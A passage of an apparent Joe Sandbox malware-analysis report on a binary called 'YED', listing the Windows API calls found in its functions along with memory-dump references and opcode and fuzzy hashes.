                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3008561057-0
                                                                                                                                                • Opcode ID: c60d8926649e8d9c52f179e17100328f92ed169e62632affbeca1fe67c89ee41
                                                                                                                                                • Instruction ID: aac7a351a7d099107727a74d96736c73e665a03d4dea845c0fafad4f6f4dd4d5
                                                                                                                                                • Opcode Fuzzy Hash: c60d8926649e8d9c52f179e17100328f92ed169e62632affbeca1fe67c89ee41
                                                                                                                                                • Instruction Fuzzy Hash: B9118171620205FFDB149FA8DC49BAEBBA9EF46355F208018F4499B110DB359964CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002714FF
                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00271506
                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00271515
                                                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00271520
                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0027154F
                                                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00271563
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1413079979-0
                                                                                                                                                • Opcode ID: bae1cc8b0d494c8a377990aa891811b0a727ba0ee2b3697555114d7406525dfc
                                                                                                                                                • Instruction ID: 388278151bae07f1bc6e5e2abba14f98612164c05add604de2df8d193cd22c92
                                                                                                                                                • Opcode Fuzzy Hash: bae1cc8b0d494c8a377990aa891811b0a727ba0ee2b3697555114d7406525dfc
                                                                                                                                                • Instruction Fuzzy Hash: 1B11677250020EABDF119FA8ED49FDF7BA9EF49704F148064FA09A2060C771CE64DB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,00233379,00232FE5), ref: 00233390
                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0023339E
                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002333B7
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00233379,00232FE5), ref: 00233409
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                • Opcode ID: 9fe5a23cf3f745e9f61f3ea7343f514e9a363bfb76232bbd7a4899751966a148
                                                                                                                                                • Instruction ID: a6b31443b58a296083442d7a28645c5a2ad2994429c3be30107f5c269fa04ab5
                                                                                                                                                • Opcode Fuzzy Hash: 9fe5a23cf3f745e9f61f3ea7343f514e9a363bfb76232bbd7a4899751966a148
                                                                                                                                                • Instruction Fuzzy Hash: 3A012DB3639313BF96146B757C8A6665B54D705376F30C26AF510811F0EF114F319984
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,00245686,00253CD6,?,00000000,?,00245B6A,?,?,?,?,?,0023E6D1,?,002D8A48), ref: 00242D78
                                                                                                                                                • _free.LIBCMT ref: 00242DAB
                                                                                                                                                • _free.LIBCMT ref: 00242DD3
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0023E6D1,?,002D8A48,00000010,00214F4A,?,?,00000000,00253CD6), ref: 00242DE0
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0023E6D1,?,002D8A48,00000010,00214F4A,?,?,00000000,00253CD6), ref: 00242DEC
                                                                                                                                                • _abort.LIBCMT ref: 00242DF2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                • Opcode ID: 318224a6cc4db6072604c3b66ae150ce8e4e9ff15073a666333cb8d748772fd8
                                                                                                                                                • Instruction ID: 951b669a53583f5ba7d387ae140be83b549fa9feeb6242b96240c7d8052793f9
                                                                                                                                                • Opcode Fuzzy Hash: 318224a6cc4db6072604c3b66ae150ce8e4e9ff15073a666333cb8d748772fd8
                                                                                                                                                • Instruction Fuzzy Hash: B5F02831D35A02E7C61E7B37BC0EF1E2659AFC27A0FB40019F824922D2EE708C394520
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 00275218
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00275229
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00275230
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00275238
                                                                                                                                                • MulDiv.KERNEL32 ref: 0027524F
                                                                                                                                                • MulDiv.KERNEL32 ref: 00275261
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                • Opcode ID: d282d970d9dc02bb11c9a723b44b928fdc55f5ba697863358364d9e94c60f811
                                                                                                                                                • Instruction ID: 39527d4af34b43e881b1bc5c563d3666a2db9664c6dfde65947d37c8cb123f4c
                                                                                                                                                • Opcode Fuzzy Hash: d282d970d9dc02bb11c9a723b44b928fdc55f5ba697863358364d9e94c60f811
                                                                                                                                                • Instruction Fuzzy Hash: A4014F75A00719BBEB109FA5AC49A5EBFB8EB49751F144065FA08A7281DA709C10CFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00229693
                                                                                                                                                  • Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296A2
                                                                                                                                                  • Part of subcall function 00229639: BeginPath.GDI32(?), ref: 002296B9
                                                                                                                                                  • Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296E2
                                                                                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002A8A4E
                                                                                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 002A8A62
                                                                                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002A8A70
                                                                                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 002A8A80
                                                                                                                                                • EndPath.GDI32(?), ref: 002A8A90
                                                                                                                                                • StrokePath.GDI32(?), ref: 002A8AA0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 43455801-0
                                                                                                                                                • Opcode ID: 71a22250ce2edb11c8c5745c3b7e43bbb43b6ff6b5c49e1b3967e34943d0c78d
                                                                                                                                                • Instruction ID: d9c81490386d9b0ae1acd63e2b4c0b034912d06e71d5442674bb36c0a3a25c74
                                                                                                                                                • Opcode Fuzzy Hash: 71a22250ce2edb11c8c5745c3b7e43bbb43b6ff6b5c49e1b3967e34943d0c78d
                                                                                                                                                • Instruction Fuzzy Hash: 7E111B7604014DFFDF129F90EC88FAA7F6CEB09350F108022BA199A1A1CB719D65DFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • PostMessageW.USER32 ref: 0027EB30
                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0027EB46
                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0027EB55
                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0027EB64
                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0027EB6E
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0027EB75
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                • Opcode ID: 1021fdf1c899ad3cae3760f738aebc8ad23dd025bfaba6270d4ac5d35484f339
                                                                                                                                                • Instruction ID: 66ebed7bf8db00c7a754de1734df4d1cbf77bf17f8b55dcbf2a4301666bfb470
                                                                                                                                                • Opcode Fuzzy Hash: 1021fdf1c899ad3cae3760f738aebc8ad23dd025bfaba6270d4ac5d35484f339
                                                                                                                                                • Instruction Fuzzy Hash: F8F01772240159BBE7219B62AC0EEAB3A7CEBCBF11F104159F601D1091EBA05A018AB5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32 ref: 00267452
                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00267469
                                                                                                                                                • GetWindowDC.USER32(?), ref: 00267475
                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00267484
                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00267496
                                                                                                                                                • GetSysColor.USER32 ref: 002674B0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 272304278-0
                                                                                                                                                • Opcode ID: 08374e017652260381f4667bac4a3eeba384091b4eb6df1fca7043cb2d25e952
                                                                                                                                                • Instruction ID: 3d62d56a7cec90b1a97e1c421cae362a3cb7ffe93a1bf30b97220ca22328c3d7
                                                                                                                                                • Opcode Fuzzy Hash: 08374e017652260381f4667bac4a3eeba384091b4eb6df1fca7043cb2d25e952
                                                                                                                                                • Instruction Fuzzy Hash: DC018B31410215EFDB109FA4ED0CBAA7BB5FB05711F600060F925A21A0CF311EA1AB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0027187F
                                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0027188B
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00271894
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0027189C
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 002718A5
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 002718AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                • Opcode ID: bfd01c299b00f6e5730d7b06c5cd92c7c052ef7e796c08cf3bb9358bbf581529
                                                                                                                                                • Instruction ID: 77f8c5649fa14b8ac2b2ac2bb7708e1640f030cf4a117ff97ca293baf48d6d91
                                                                                                                                                • Opcode Fuzzy Hash: bfd01c299b00f6e5730d7b06c5cd92c7c052ef7e796c08cf3bb9358bbf581529
                                                                                                                                                • Instruction Fuzzy Hash: 31E07576204505FBDB016FA5FD0C94ABF79FF4AB22B608625F22981471DF329461DF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625
                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 0027C6EE
                                                                                                                                                • _wcslen.LIBCMT ref: 0027C735
                                                                                                                                                • SetMenuItemInfoW.USER32 ref: 0027C79C
                                                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0027C7CA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                • String ID: 0
                                                                                                                                                • API String ID: 1227352736-4108050209
                                                                                                                                                • Opcode ID: d645256636f15c6dfa320cc9c055bdfcf8269d8c626f14e0e950b16ee9af6a52
                                                                                                                                                • Instruction ID: 1f84185c02c30a7a737104ea0a3470285c8a18ad0a775e0fb50202a27eda19a6
                                                                                                                                                • Opcode Fuzzy Hash: d645256636f15c6dfa320cc9c055bdfcf8269d8c626f14e0e950b16ee9af6a52
                                                                                                                                                • Instruction Fuzzy Hash: 1951E3716343029BD7199F38D885A6BB7E8AF85310F24892DF599E21D0DB70D9248F52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 0029AEA3
                                                                                                                                                  • Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625
                                                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 0029AF38
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0029AF67
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                • String ID: <$@
                                                                                                                                                • API String ID: 146682121-1426351568
                                                                                                                                                • Opcode ID: 4633c49bec2bd7431709f6aba9c155d6b64f9fff0dd943e1a5b16fd3cb235e98
                                                                                                                                                • Instruction ID: 8e7b802c29244f8e191dcf32c3cf6f51b9ee04e4dff9220a20bf5d7e3dadf40e
                                                                                                                                                • Opcode Fuzzy Hash: 4633c49bec2bd7431709f6aba9c155d6b64f9fff0dd943e1a5b16fd3cb235e98
                                                                                                                                                • Instruction Fuzzy Hash: D2715670A20219DFCF14DF54C484A9EBBF1BF08300F0484A9E856AB662CB71ED95CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00277206
                                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0027723C
                                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 0027724D
                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002772CF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                • String ID: DllGetClassObject
                                                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                                                • Opcode ID: ac32ed0e29e5c56378de251611a60bd581fba6c6c6ef0c4d8af41e64176515ba
                                                                                                                                                • Instruction ID: 6c08833049ba8c21e88ee07045fd6c968261bb23998e81fc9a0c15410c8bf16c
                                                                                                                                                • Opcode Fuzzy Hash: ac32ed0e29e5c56378de251611a60bd581fba6c6c6ef0c4d8af41e64176515ba
                                                                                                                                                • Instruction Fuzzy Hash: 03418D71A14204EFDB15CF64C884A9A7BB9EF49314F24C0AABD19DF20AD7B0DD54CBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002A2F8D
                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 002A2F94
                                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002A2FA9
                                                                                                                                                • DestroyWindow.USER32 ref: 002A2FB1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                                                • Opcode ID: f4a80fa04916e51a630ae662191fb156a79344a67430ae5cff73e5964de90351
                                                                                                                                                • Instruction ID: 07565d61ee2b9eac3470fd259fb16cf223d24d8dca55479a39b0b95325ea06d8
                                                                                                                                                • Opcode Fuzzy Hash: f4a80fa04916e51a630ae662191fb156a79344a67430ae5cff73e5964de90351
                                                                                                                                                • Instruction Fuzzy Hash: F721C071220206EFEB108F68DC84FBB77BDEB5A364F104219FA50D6590DB71DCA59B60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00234D1E,002428E9,?,00234CBE,002428E9,002D88B8,0000000C,00234E15,002428E9,00000002), ref: 00234D8D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00234D1E,002428E9,?,00234CBE,002428E9,002D88B8,0000000C,00234E15,002428E9,00000002), ref: 00234DA0
